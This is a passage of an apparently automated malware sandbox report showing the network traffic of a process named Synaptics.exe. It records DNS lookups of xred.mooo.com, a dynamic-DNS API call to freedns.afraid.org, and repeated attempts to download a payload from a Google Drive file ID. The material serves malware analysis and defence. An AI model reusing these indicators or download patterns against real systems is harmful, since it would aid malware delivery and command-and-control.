                                                                                                                    Jan 7, 2025 13:18:39.724972963 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.877137899 CET44349865142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.877183914 CET44349865142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.877235889 CET49865443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.877263069 CET44349865142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.877363920 CET49865443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.878189087 CET44349865142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.878233910 CET44349865142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:39.878242970 CET49865443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:39.878273010 CET49865443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:40.343178034 CET44349876142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:40.343271017 CET49876443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:40.343975067 CET44349876142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:40.344023943 CET49876443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:40.352684021 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:40.352802992 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:40.358230114 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:40.358314991 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:40.359006882 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:40.359055996 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:46.746095896 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:46.746123075 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:46.749432087 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:46.749444962 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:46.749728918 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:46.749816895 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:46.749882936 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:46.749892950 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:46.750322104 CET49876443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:46.750339031 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:46.750349998 CET44349876142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:46.750720978 CET44349876142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:46.750765085 CET49876443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:46.791338921 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.067473888 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.067687035 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:47.068718910 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.068758965 CET44349877142.250.185.110192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.068766117 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:47.068798065 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:47.087347031 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.087399006 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.087408066 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:47.087423086 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.087443113 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:47.087480068 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:47.087486982 CET44349878142.250.186.161192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:47.087729931 CET49878443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:47.918863058 CET4975380192.168.2.1169.42.215.252
                                                                                                                    Jan 7, 2025 13:18:47.918939114 CET49877443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:47.919449091 CET49876443192.168.2.11142.250.185.110
                                                                                                                    Jan 7, 2025 13:18:47.919483900 CET49865443192.168.2.11142.250.186.161
                                                                                                                    Jan 7, 2025 13:18:47.919539928 CET49878443192.168.2.11142.250.186.161

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 7, 2025 13:18:27.670217991 CET5554153192.168.2.111.1.1.1
                                                                                                                    Jan 7, 2025 13:18:27.676908016 CET53555411.1.1.1192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:28.531847000 CET5254153192.168.2.111.1.1.1
                                                                                                                    Jan 7, 2025 13:18:28.539412022 CET53525411.1.1.1192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:28.542031050 CET6402553192.168.2.111.1.1.1
                                                                                                                    Jan 7, 2025 13:18:28.687283993 CET53640251.1.1.1192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:28.744261980 CET6278453192.168.2.111.1.1.1
                                                                                                                    Jan 7, 2025 13:18:28.751075029 CET53627841.1.1.1192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:32.960489988 CET6087153192.168.2.111.1.1.1
                                                                                                                    Jan 7, 2025 13:18:32.969486952 CET53608711.1.1.1192.168.2.11
                                                                                                                    Jan 7, 2025 13:18:38.932378054 CET5604653192.168.2.111.1.1.1
                                                                                                                    Jan 7, 2025 13:18:38.941159010 CET53560461.1.1.1192.168.2.11

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Jan 7, 2025 13:18:27.670217991 CET192.168.2.111.1.1.10x8dStandard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:18:28.531847000 CET192.168.2.111.1.1.10x94a6Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:18:28.542031050 CET192.168.2.111.1.1.10xe81cStandard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:18:28.744261980 CET192.168.2.111.1.1.10x2461Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:18:32.960489988 CET192.168.2.111.1.1.10x8428Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:18:38.932378054 CET192.168.2.111.1.1.10x4a51Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Jan 7, 2025 13:18:20.515013933 CET1.1.1.1192.168.2.110x70c9No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:18:20.515013933 CET1.1.1.1192.168.2.110x70c9No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:18:27.676908016 CET1.1.1.1192.168.2.110x8dNo error (0)docs.google.com142.250.185.110A (IP address)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:18:28.539412022 CET1.1.1.1192.168.2.110x94a6Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:18:28.687283993 CET1.1.1.1192.168.2.110xe81cNo error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:18:28.751075029 CET1.1.1.1192.168.2.110x2461No error (0)drive.usercontent.google.com142.250.186.161A (IP address)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:18:32.969486952 CET1.1.1.1192.168.2.110x8428Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:18:38.941159010 CET1.1.1.1192.168.2.110x4a51Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:19:30.852786064 CET1.1.1.1192.168.2.110xdf70No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 7, 2025 13:19:30.852786064 CET1.1.1.1192.168.2.110xdf70No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • docs.google.com
                                                                                                                    • drive.usercontent.google.com
                                                                                                                    • freedns.afraid.org

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.114975369.42.215.252802260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 7, 2025 13:18:28.693512917 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                    User-Agent: MyApp
                                                                                                                    Host: freedns.afraid.org
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Jan 7, 2025 13:18:29.317869902 CET243INHTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:29 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: keep-alive
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    X-Cache: MISS
                                                                                                                    Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                    HTTPS Proxied Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.1149744142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:28 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-1DZ1eTYPl7j2DUiRdcMW4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.1149745142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:28 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:28 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:28 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Vt1MWP_oupsikF3vheqfVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.1149754142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:29 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CvrImC751Xf38-8ICjW-fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.1149755142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:29 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-07 12:18:29 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4Abtg2ITdHLlXhLkFQzK74zzYUN73qoq7aMNRJ8howqASwprWyEbv_N4ONIZofelFs
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:29 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-4jtpZ9yD2N_-NK5Jmf0TPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=i1tMKc6yLjj--7fan0rbLuRCWLfoAgwT3UT9WfUdnlJhpTvE_QyvzKFQpziQUyRFjIPk3RQf0aV54pT7PcIsKeGo8DNIeXtzNpkR3_xuIuxZ4zbg2pSE3qBkLS7ye7gITU8qVAEvbdLRrA4Aa9dGuCsdu7cX7sY-f4c_h-DCw4m1pFS549dDf4B5; expires=Wed, 09-Jul-2025 12:18:29 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:29 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 69 69 33 69 70 57 30 5a 44 4e 4d 52 34 32 35 7a 65 30 31 35 48 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ii3ipW0ZDNMR425ze015HA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                    2025-01-07 12:18:29 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.1149757142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:29 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:29 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:29 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3mpD86N0T-Obd1TebyJmbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.1149756142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:29 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-07 12:18:30 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7R0MHyI5-6VfOQ8N3LdPxjeM0PTUTztLgxZ1AtA9uGXHGr4M7h4x_ty95ZKhuG4vax
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:29 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-eQiJQVd2AWJm0bvM7bOWVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8; expires=Wed, 09-Jul-2025 12:18:29 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:30 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 61 62 74 66 73 4c 6b 46 4e 78 56 51 64 5a 7a 73 78 4b 70 57 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="gabtfsLkFNxVQdZzsxKpWA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                    2025-01-07 12:18:30 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
